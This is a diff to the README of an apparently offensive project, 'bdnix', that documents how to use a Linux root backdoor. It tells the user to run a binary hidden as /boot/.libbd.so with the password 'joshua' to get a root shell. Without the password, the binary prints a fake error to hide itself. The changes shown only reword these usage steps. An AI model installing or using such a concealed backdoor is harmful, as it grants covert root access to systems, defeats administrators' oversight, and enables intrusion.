emanuelepaiano/bdnix/README.md

 4) logout from server and log in again with unprivileged user.

-5) Run binary with joshua to enable backdoor
+5) Run binary with joshua argument to enable backdoor
 <pre>
    $ /boot/.libbd.so joshua /bin/sh
+   #

-   if you see '#' then.. you are root! :)
+   You can see '#': you are root! :)
    </pre>

-6) if you run without joshua password, you can read a (fake) error:
+6) Running without joshua password, you can read a (fake) error:
 <pre>
 /bin/sh: cannot execute binary file
 </pre>